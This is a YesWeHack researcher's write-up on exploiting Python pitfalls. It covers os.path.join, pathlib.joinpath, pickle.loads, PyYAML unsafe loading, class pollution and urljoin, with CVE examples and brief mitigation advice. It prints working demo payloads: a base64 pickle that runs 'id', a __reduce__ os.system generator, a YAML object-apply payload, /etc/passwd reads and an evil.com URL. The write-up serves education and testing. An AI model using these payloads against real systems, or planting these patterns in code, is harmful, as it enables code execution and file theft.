Writeup by Alex Brumen aka Brumens, researcher enablement analyst, YesWeHack
In this article, you will discover and learn how to exploit common Python pitfalls that arise from subtle but dangerous behaviours in standard functions. These include path manipulation issues in os.path.join, URL handling quirks in urljoin, and class pollution problems in Python object handling.
I provide step-by-step guidance, supported by practical examples, on crafting payloads tailored to each function. These examples demonstrate how seemingly safe logic can be abused to achieve path traversal (CWE-22) and, in some cases, escalated into remote code execution (RCE).
Developers often assume that built-in functions automatically perform sanitisation or enforce safe behaviour. In reality, many of these functions contain edge-case behaviours that attackers can abuse to transform logic issues into exploitable vulnerabilities. For example, YAML deserialisation is commonly expected to simply parse structured data. However, when using PyYAML, the most widely adopted YAML library in Python, unsafe loaders can execute arbitrary Python code based on attacker-controlled input.
Whether you’re a pentester, security researcher or Bug Bounty hunter, this guide offers actionable advice on attacking commonly used functions in Python to exploit security vulnerabilities.
You can also explore these methods by watching my presentation of this research during the NahamCon 2025 Winter Edition and put them into practice by tackling my ‘Python Pitfalls’ training modules on Dojo.
How do Python security pitfalls arise in development
Python vulnerabilities often arise when developers use functions or libraries without reading the relevant documentation, instead making assumptions about a function’s behaviour based on its name or brief description.
Most functions include an explanation of their intended purpose in the official documentation or docstrings, often accompanied by warnings of when a known behaviour could be dangerous. However, many functions exhibit subtle or unexpected behaviours that are easy to miss. These details are frequently buried within the documentation or only become apparent when reading more deeply into the function’s exact behaviour.
As an example, the function os.path.join has an unexpected behaviour: it truncates the path if one part of the path starts with a forward slash.
Example code:
1import os2# Payload is an absolute path, starts with "/"3payload = "/etc/passwd"45file = os.path.join("/user/uploads/", payload)67with open(file, "r") as f:8 print(f.read()) # output the content of the file: "/etc/passwd"
Although this unexpected behaviour is mentioned inline within the documentation, it is easily overlooked. If you use this function together with unsanitised user input, you're vulnerable to path traversal. This can result in an attacker being able to perform file overwrites, read system files or achieve code injection.
Goal of this research
The research objective was to identify Python functions that are frequently found in production applications, before crafting payloads that weaponize the aforementioned ‘Python pitfalls’.
As with most of my research, this project started with me trawling through documentation. This time, the focus was on Python’s os.path.join function, as mentioned earlier. I’ve known for years about how this function discards earlier path segments if a later component is an absolute path, and I’ve always been fascinated by unexpected behaviours that are intentionally built into functions. These edge cases are goldmines for hackers.
Finally, I’ve got round to digging deeper into Python as a programming language, and exploring how these design choices translate into practical pitfalls and how they can be abused in real-world attack scenarios.
MORE RESEARCH BY THIS AUTHOR The minefield between syntaxes: exploiting syntax confusions in the wild
Black-box testing for Python bugs
Black-box testing is a foundational skill for bug hunters and pentesters. It’s the art of understanding application behaviour by analysing how it responds to different inputs, without having access to the underlying source code.
Most real-world engagements involve attacking applications in a black-box environment. That’s why it’s essential to develop a strategy for fingerprinting the Python pitfalls we’re about to explore. Before doing so, you need to understand the core concepts of what to observe and extract from an application’s responses.
As an attacker, you should focus on the following key factors:
- Time delays
- Content
- Errors
- Reflected values
- Process result
- Verbose messages
- Syntax
When these behaviours appear only after sending a weaponised payload but change or disappear when a benign payload is used, it’s a strong indication that you’re triggering input-dependent code logic. This behaviour may directly expose a vulnerability or reveal a hidden pitfall in the application’s logic that warrants further testing.
Detecting Python pitfall patterns
When identifying Python pitfalls, your focus should be on how user-controlled input is handled by specific functions or code patterns. Look for:
- The function’s behaviour changing depending on the supplied input
- The function performing normalisation that alters the original input
- The function parsing or interpreting input instead of treating it as raw data
These patterns frequently introduce subtle logic flaws that can be escalated into exploitable vulnerabilities.
Commonly exploitable Python functions
During the research, I discovered six different Python pitfalls. Five originate from built-in libraries, and one comes from a widely used external library.
The affected functions are:
os.path.join(built-in)pathlib.joinpath(built-in)pickle.loads(built-in)urllib.parse.urljoin(built-in)PyYAML's load function(external library)Python3 class pollution(built-in)
os.path.join & path traversal
Python’s os.path.join function joins one or more path segments and returns a single, concatenated path.
The main pitfall lies in how this behaviour is commonly misunderstood. Many developers assume that os.path.join sanitises or normalises all path components as part of the joining process. Based on this assumption, they might apply flawed logic, believing that inputs such as dot-dot-slash (../) sequences or absolute paths embedded in the middle of the path will be safely normalised or rejected.
In reality, os.path.join does not prevent path traversal or enforce path containment, and will happily discard earlier path segments if an absolute path appears later in the input. The documentation does mention this behaviour, but only inline and without strong warnings, making it easy to overlook during development.
The following code snippet demonstrates this pitfall:
1import os2payload = "/etc/passwd"34file = os.path.join("/user/uploads/", payload)56with open(file, "r") as f:7 print(f.read()) # print the “/etc/passwd” file content
Here’s a useful visualisation of the code workflow for os.path.join:
Risks exposed
The primary vulnerability exposed by this pitfall is path traversal, which can lead to several high-impact issues, including:
- Arbitrary system file reads
- File overwrite
- Remote code execution (RCE)
These impacts depend on how the resulting path is used within the application and whether additional unsafe operations are performed on the resolved file path.
Real-world vulnerabilities: CVEs exploiting os.path.join pitfalls
Production applications continue to fall victim to developers’ ignorance of this os.path.join pitfall, as the following vulnerabilities demonstrate:
CVE-2025-57403 – path traversal to RCE
Unsanitised os.path.join input in Gerapy allowed arbitrary file writes, escalating to remote code execution through critical file overwrites.
CVE-2025-6278 – Absolute path truncation
Missing path validation in Upsonic allowed absolute paths (/etc/passwd) to truncate base directories, enabling arbitrary file reads.
PyPA issue #4946 – Path traversal leads to arbitrary file write
In Setuptools’ PackageIndex.download, path construction from archive contents without validation allowed malicious packages to extract files outside intended directories, affecting thousands of dependent projects.
Practical lab for os.path.join
Want to put this knowledge into practice? I published a training module and lab for testing this pitfall on Dojo, our CTF platform. This is available to run directly in your browser.
pathlib.joinpath & path traversal
The pathlib.joinpath method is very similar to os.path.join. Calling it is equivalent to appending each provided path segment in sequence.
Just like os.path.join, you might expect joinpath to sanitise input or enforce safe normalisation. But that is not the case. If any segment is an absolute path, it discards the earlier parts and continues from the absolute path. It also accepts dot-dot-slash sequences, which means user-controlled input can still lead to path traversal if you rely on it for safety.
Example code:
1from pathlib import Path2payload = "/etc/passwd"34file = Path("/var/www/html").joinpath("files", payload)56with open(file, "r") as f:7 print(f.read()) # print the “/etc/passwd” file content
Here’s a useful visualisation of the code workflow for pathlib.joinpath:
Risks exposed
The similarities with os.path.join mean the pitfalls I found in pathlib.joinpath also lead to path traversal vulnerabilities, with the same impacts:
- Arbitrary system file reads
- File overwrite
- Remote code execution (RCE)
These impacts depend on how the resulting path is used within the application. If the output of pathlib.joinpath is passed directly to file operations such as read or write without additional validation, the application becomes vulnerable.
Practical lab for pathlib.joinpath
Want to put this knowledge into practice? I published a training module and lab for testing this pitfall on Dojo, our CTF platform. This is available to run directly in your browser.
pickle.loads & RCE
Python’s pickle module is well known for being dangerous when used with user-controlled input, especially the function pickle.loads. While this behaviour can be considered a pitfall, using this function with untrusted input introduces a direct vulnerability known as deserialization of untrusted data (CWE-502), which can result in arbitrary code execution and full RCE.
Example code:
1import pickle, base642payload = "gASVHQAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjAJpZJSFlFKULg=="34# Execute code during unserialization (system command: ”id”)5file = pickle.loads(base64.b64decode(payload))
To trigger a Python code injection, we could use a script like this:
1import os, base64, pickle23class RCE:4 def __reduce__(self):5 cmd = "id"6 return os.system, (cmd,)78pickled = pickle.dumps(RCE())9print( "Payload:", base64.urlsafe_b64encode(pickled).decode("utf-8") )
The code above creates a serialised object that, once deserialised, executes the system command id via the __reduce__ object method.
Example workflow when using pickle.loads:
Risks exposed
The pickle.loads pitfall exposes a vulnerability that can result in code injection and, consequently, RCE.
Real-world vulnerabilities: CVEs exploiting pickle.loads
Developers seeking an easy way to deserialize data can inadvertently create vulnerabilities through their use of pickle.loads. This trio of CVEs demonstrate the problem is a recent one:
CVE-2025-3108 – insecure deserialization to RCE in JsonPickleSerializer
JsonPickleSerializer prioritizes deserialization using pickle.loads(), which can execute arbitrary code when processing untrusted data.
CVE-2026-23946 – insecure deserialization to RCE in Helpdesk module
Remote code execution possible for an attacker authenticated with staff-level privileges.
CVE-2025-1716 – RCE via malicious pickle file bypassing static analysis in Picklescan
An unsafe deserialization vulnerability in Python’s pickle module allowed an attacker to bypass static analysis tools like Picklescan and execute arbitrary code during deserialization.
Practical lab for pickle.loads
Want to put this knowledge into practice? I published a training module and lab for testing this pitfall on Dojo, our CTF platform. This is available to run directly in your browser.
PyYAML & insecure deserialisation
Moving beyond built-in modules, when developers handle YAML-based data they most often turn to PyYAML. This external library makes it easy to serialise and deserialise YAML data.
However, there is an important catch in the documentation. When deserialising YAML data, developers often rely on PyYAML’s load function. If a safe loader is not explicitly specified, the application may become vulnerable to insecure deserialisation (CWE-502), in a manner similar to pickle.loads.
Using an unsafe loader allows attacker-controlled YAML content to instantiate arbitrary Python objects, which can lead to code execution during deserialisation.
Example code:
1import yaml2user_data = "!!python/object/apply:print ['pwned']"34result = yaml.load(user_data, Loader=yaml.Loader)
In the code above, the user input !!python/object/apply:print ['pwned'] instructs PyYAML’s loader (yaml.Loader) to invoke a Python function during deserialisation, resulting in code: print('pwned') being executed by the application.
Example workflow when using yaml.load:
Risks exposed
Using yaml.load() with an unsafe loader introduces a code-execution vulnerability, potentially leading to RCE, similar to the risks associated with pickle.loads.
Real-world vulnerabilities: CVEs exploiting yaml.load
YAML is commonly used for configuration files, which often contain user-controllable data. Developers who use yaml.load without restricting the loader may unintentionally enable dangerous object deserialisation. This pitfall has been exposed by multiple CVEs:
CVE-2025-50460 – insecure YAML deserlization leading to RCE in ms-swift
An RCE in version 3.3.0 caused by unsafe deserialization in tests/run.py using yaml.load() from the PyYAML library (versions = 5.3.1).
CVE-2026-24009 – PyYAML insecure deserialization leading to RCE in Docling Core
Vulnerability present in applications using PyYAML prior to version 5.4 and invoking docling_core.types.doc.DoclingDocument.load_from_yaml() with untrusted YAML data.
Practical lab for yaml.load
Want to put this knowledge into practice? I published a training module and lab for testing this pitfall on Dojo, our CTF platform. This is available to run directly in your browser.
Python3 & class pollution
Python can be vulnerable to class pollution. Unlike the other pitfalls covered here, this is not tied to a specific function but instead relates to how Python handles variables in memory and how they can be unexpectedly overwritten if improperly managed. Class pollution typically arises in code that merges objects insecurely.
Example code:
1some_var = "change me!"23class Dummy:4 def __init__(self):5 pass67def merge(source, destination):8 for key, value in source.items():9 if hasattr(destination, "get"):10 if destination.get(key) and type(value) == dict:11 merge(value, destination.get(key))12 else:13 destination[key] = value14 elif hasattr(destination, key) and type(value) == dict:15 merge(value, getattr(destination, key))16 else:17 setattr(destination, key, value)1819some_class = Dummy()2021payload = {22 "__init__": {23 "__globals__": {24 "some_var": "polluted"25 }26 }27}2829merge(payload, some_class)3031print(some_var) # Output: polluted
Example workflow when using for Python class pollution:
Risks exposed
Because this pitfall affects how objects and classes are merged or modified at runtime, Python class pollution primarily introduces risks related to unintended attribute or variable overwrites in memory, which can directly impact application logic.
The following CWEs may be exposed when an application is vulnerable to Python class pollution:
- CWE-454: External initialization of trusted variables or data stores
- CWE-269: improper privilege management
- CWE-94: improper control of generation of code (‘code injection’)
Class pollution impact heavily depends on what data can be affected within the application, meaning a variety of security vulnerabilities may be exposed as a result.
Real-world vulnerabilities: CVEs exploiting Python class pollution
Class pollution vulnerabilities are relatively rare, but when developers do fall victim to this pitfall it often leads to severe security issues, as the following CVE demonstrates:
CVE-2025-58367 – class pollution via Delta class constructor in DeepDiff
An available gadget allowed deepdiff.serialization.SAFE_TO_IMPORT to be modified to permit dangerous classes such as posix.system, enabling insecure Pickle deserialisation via the Delta class and potentially allowing arbitrary Python code execution.
Practical lab for pitfalls using Python class pollution
Want to put this knowledge into practice? I published a training module and lab for testing this pitfall on Dojo, our CTF platform. This is available to run directly in your browser.
Python urllib.parse.urljoin
Python’s urllib.parse.urljoin function constructs a final URL by combining a base URL with one or more URL components.
What makes this behaviour surprising is that, unlike os.path.join and pathlib.joinpath – which truncate earlier path segments when an absolute path is encountered – urllib.parse.urljoin discards the entire base URL when an absolute URL is provided as input, ignoring everything that came before it.
Example code:
1from urllib.parse import urljoin23payload = "http://evil.com/"4print(urljoin("http://example.com/", payload)) # output: http://evil.com/
Example workflow when using for Python urljoin:
Risks exposed
This behaviour is easy to overlook and can introduce serious security issues when user input is involved. Developers often assume that urljoin always appends paths safely, but this truncation logic can be abused to redirect requests, bypass allow-lists or trigger other unintended behaviours.
The following vulnerabilities may be introduced:
- CWE-918: server-side request forgery (SSRF)
- CWE-22: path traversal
- CWE-235: improper handling of extra parameters
- CWE-601: URL redirection to untrusted site (‘open redirect’)
Real-world vulnerabilities: CVEs exploiting Python urljoin
Developers tend to use urljoin when building URLs for redirects or performing internal requests. Without proper sanisation of user-controllable input, this can expose serious vulnerabilities. Here are some real-world examples:
CVE-2024-42353 – vulnerability in WebOb’s HTTP location header normalization process
When normalising the HTTP Location header, WebOb parsed the redirect URL using urlparse and joined it to the base URL. A URL beginning with // was treated by urlparse as a scheme-less URI, causing the following segment to be interpreted as a hostname, which urljoin then used to replace the original.
CVE-2025-68696 – SSRF in httparty
Issue posed a risk of leaking API keys, and could allow third parties to issue requests to internal servers.
Practical lab for urljoin
Want to put this knowledge into practice? I published a training module and lab for testing this pitfall on Dojo, our CTF platform. This is available to run directly in your browser.
Mitigation best practices for Python pitfalls: improve your code logic
A code pitfall is not a vulnerability by itself. The only reliable way to avoid falling into these traps is to read and adhere to the documentation for the functions you use, especially when they process user-controlled input. It’s essential to understand the function’s logic, internal workflow and how its behaviour changes based on the input it receives.
With this understanding, developers can use or implement appropriate sanitisation mechanisms to prevent these pitfalls from turning into real vulnerabilities.
Python pitfalls research roadmap
Python pitfalls, along with similar issues across other programming languages and frameworks, will always exist, and many have yet to be discovered. Problematic code logic and unexpected behaviours triggered by user-controlled input continue to arise, giving attackers the opportunity to achieve unintended and sometimes severe impact.
Less-documented or misunderstood behaviours in functions that process user input represent valuable targets for security researchers and bug bounty hunters, as they often expose novel and unconventional exploitation paths. As programming languages evolve and frameworks are updated, new variants of these pitfalls continue to emerge in modern applications – making continuous research and testing essential for staying ahead of the threat landscape.
References and further reading
- Python 3.14.3 documentation
- Watch Brumens present this research at Nahamcon 2025 Winter Edition
- Training modules with labs on ‘Exploiting Python Pitfalls’
MORE RESEARCH BY THIS AUTHOR The minefield between syntaxes: exploiting syntax confusions in the wild



